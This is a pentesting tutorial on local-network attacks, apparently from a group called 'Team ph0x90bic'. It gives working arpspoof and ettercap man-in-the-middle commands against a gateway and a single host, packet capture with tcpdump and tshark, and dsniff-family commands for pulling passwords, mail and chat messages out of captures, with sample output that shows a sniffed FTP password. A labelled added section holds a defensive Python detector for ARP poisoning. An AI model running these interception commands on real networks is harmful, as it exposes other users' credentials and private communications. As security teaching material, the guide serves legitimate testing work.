Pentesting In Local Networks [Unix]

---------------------------------------
| Team ph0x90bic proudly presents     |
| Pentesting in Local Networks Part 1 |
| Reconnaissance and ARP Poisoning    |
---------------------------------------

INTRODUCTION

This paper describes standard reconnaissance, ARP poisoning and traffic
analysis techniques with dsniff, ettercap and netdiscover on local networks.
All tools needed are preinstalled on NodeZero Linux.

Tools needed:

* netdiscover		(Search for hosts on local network)
* tcpdump/tshark	(Sniff network traffic)
* dsniff/ettercap	(Launch ARP-Poisoning and analyze pcap files)

---

CHECK LOCAL NETWORK CONFIGURATION

First check your local network configuration to gain information about
the local network you are connected to.

# sudo ifconfig

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:18308 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18308 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:9599453 (9.5 MB)  TX bytes:9599453 (9.5 MB)

wlan0     Link encap:Ethernet  HWaddr 90:4c:e5:a5:9c:2b  
          inet addr:10.0.0.1  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80::924c:e5ff:fea5:9c2b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:32320 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30280 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:21141126 (21.1 MB)  TX bytes:16626291 (16.6 MB)

# sudo route -n

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.0.0.0        0.0.0.0         255.255.255.0   U     2      0        0 wlan0
169.254.0.0     0.0.0.0         255.255.0.0     U     1000   0        0 wlan0
0.0.0.0         10.0.0.254      0.0.0.0         UG    0      0        0 wlan0

RESULTS

Ownipv4:	10.0.0.1
Ownipv6:	fe80::924c:e5ff:fea5:9c2b/64
Gateway:	10.0.0.254
Netmask:	255.255.255.0
Network:	10.0.0.0/24
Interface:	wlan0

---

COLLECT PASSIVE INFORMATION

You can collect information without sending any network traffic by sniffing
with tshark or tcpdump. Netdiscover in passive mode (-p) lists the live hosts
in real time and shows the MAC vendor of each.

# sudo tshark -n -i wlan0 -w netlog.pcap not src 10.0.0.1 &
# sudo tshark -n -i wlan0 not src 10.0.0.1

# sudo tcpdump -n -i wlan0 -w netlog.pcap not src 10.0.0.1 &
# sudo tcpdump -n -i wlan0 not src 10.0.0.1

# sudo netdiscover -p -i wlan0

--- SNIPPED TCPDUMP OUTPUT START ---
...
16:43:46.886878 ARP, Request who-has 10.0.0.254 tell 10.0.0.254, length 28
16:43:46.888905 ARP, Request who-has 10.0.0.2 tell 10.0.0.254, length 28
16:43:46.889431 ARP, Request who-has 10.0.0.3 tell 10.0.0.254, length 28
16:43:46.891183 ARP, Request who-has 10.0.0.4 tell 10.0.0.254, length 28
...
--- SNIPPED TCPDUMP OUTPUT END ---

--- NETDISCOVER OUTPUT START ---
 Currently scanning: (passive)   |   Screen View: Unique Hosts

 174 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 7344
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 10.0.0.254      00:1f:9f:e9:1e:a6    157  6594   Thomson Telecom Belgium
 10.0.0.3        00:24:21:ba:04:bd    02    120   Unknown vendor
 10.0.0.2        00:18:de:60:9f:7d    02    084   Intel Corporation
 0.0.0.0         00:18:de:60:9f:7d    03    126   Intel Corporation
 10.0.0.4        00:90:4b:94:2d:0d    10    420   GemTek Technology Co., Ltd.
--- NETDISCOVER OUTPUT END ---

RESULTS

Hosts:		10.0.0.2 (00:18:de:60:9f:7d)
		10.0.0.3 (00:24:21:ba:04:bd)
		10.0.0.4 (00:90:4b:94:2d:0d)

---

ARPSPOOFING ALL HOSTS

You can arpspoof all hosts on the local network. This is dangerous in large
networks, because it puts the traffic of every host through your machine and
degrades network performance. In small networks spoofing all hosts works
without any problems.

# sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1

# sudo arpspoof -i wlan0 10.0.0.254
# sudo ettercap -TQM arp:remote -i wlan0 // /10.0.0.254/

RESULTS

Sniffed traffic from all hosts on network as pcap file in landump.pcap
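As an added example (not part of the original paper), a small Python detector that builds the IP-to-MAC table netdiscover shows from tcpdump ARP reply lines and flags the IP/MAC conflict that the gateway arpspoof above produces on the wire. The sample lines are constructed from the addresses on this page; the line format assumes tcpdump with -n.

```python
import re
from collections import defaultdict

# tcpdump -n prints ARP traffic in two shapes:
#   "... ARP, Request who-has 10.0.0.2 tell 10.0.0.254, length 28"
#   "... ARP, Reply 10.0.0.254 is-at 00:1f:9f:e9:1e:a6, length 28"
# Only a Reply carries a MAC, so the inventory is built from replies.
REPLY_RE = re.compile(r"ARP, Reply (\S+) is-at ([0-9a-f:]{17})", re.I)

def parse_arp_replies(lines):
    """Yield (ip, mac) for every ARP Reply line in tcpdump output."""
    for line in lines:
        m = REPLY_RE.search(line)
        if m:
            yield m.group(1), m.group(2).lower()

def build_inventory(lines):
    """Map each IP to the ordered list of distinct MACs seen claiming it."""
    inv = defaultdict(list)
    for ip, mac in parse_arp_replies(lines):
        if mac not in inv[ip]:
            inv[ip].append(mac)
    return dict(inv)

def find_conflicts(inventory, gateway):
    """Flag IPs claimed by more than one MAC. A second MAC answering for
    the gateway is exactly what arpspoof/ettercap produce (see above)."""
    alerts = []
    for ip, macs in inventory.items():
        if len(macs) > 1:
            kind = "GATEWAY-MAC-CHANGE" if ip == gateway else "IP-MAC-CONFLICT"
            alerts.append((kind, ip, macs))
    return alerts

# Constructed sample: legitimate replies first, then the wlan0 host from the
# page (90:4c:e5:a5:9c:2b) answering for the gateway 10.0.0.254.
SAMPLE = """\
16:43:46.887 ARP, Reply 10.0.0.254 is-at 00:1f:9f:e9:1e:a6, length 28
16:43:46.889 ARP, Reply 10.0.0.2 is-at 00:18:de:60:9f:7d, length 28
16:43:46.891 ARP, Request who-has 10.0.0.4 tell 10.0.0.254, length 28
16:43:46.893 ARP, Reply 10.0.0.4 is-at 00:90:4b:94:2d:0d, length 28
16:44:02.100 ARP, Reply 10.0.0.254 is-at 90:4c:e5:a5:9c:2b, length 28
""".splitlines()

if __name__ == "__main__":
    inv = build_inventory(SAMPLE)
    for kind, ip, macs in find_conflicts(inv, "10.0.0.254"):
        print(f"{kind}: {ip} claimed by {', '.join(macs)}")
```

Fed with a live `tcpdump -n -i wlan0 arp` stream instead of SAMPLE, the same functions give a minimal ARP-poisoning monitor for the segment.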

---

ARPSPOOF SPECIFIC HOST

On larger networks use this attack to arpspoof a specific host only.

# sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1

# sudo arpspoof -i wlan0 -t 10.0.0.2 10.0.0.254
# sudo ettercap -TQM arp:remote -i wlan0 /10.0.0.2/ /10.0.0.254/

RESULTS

Sniffed traffic from 10.0.0.2 only as pcap file in landump.pcap

---

DSNIFF

You can analyze the pcap files easily with the dsniff tools, or manually with
strings, grep or similar tools.

# sudo dsniff -n -p landump.pcap			(Passwords)
# sudo urlsnarf -n -p landump.pcap			(HTTP Requests)
# sudo filesnarf -n -p landump.pcap			(NFS Files)
# sudo mailsnarf -n -p landump.pcap			(SMTP/POP mails)
# sudo msgsnarf -n -p landump.pcap			(Chat messages)
# sudo strings landump.pcap | grep -i 'yourstring'	(Manual analysis)

--- DSNIFF OUTPUT START ---
03/18/11 20:48:12 tcp 10.0.0.2.50222 -> openbsd.sunsite.ualberta.ca.21 (ftp)
USER anonymous
PASS SUPERGEHEIM
--- DSNIFF OUTPUT END ---

RESULTS

Cleartext information in sniffed pcap traffic.

---
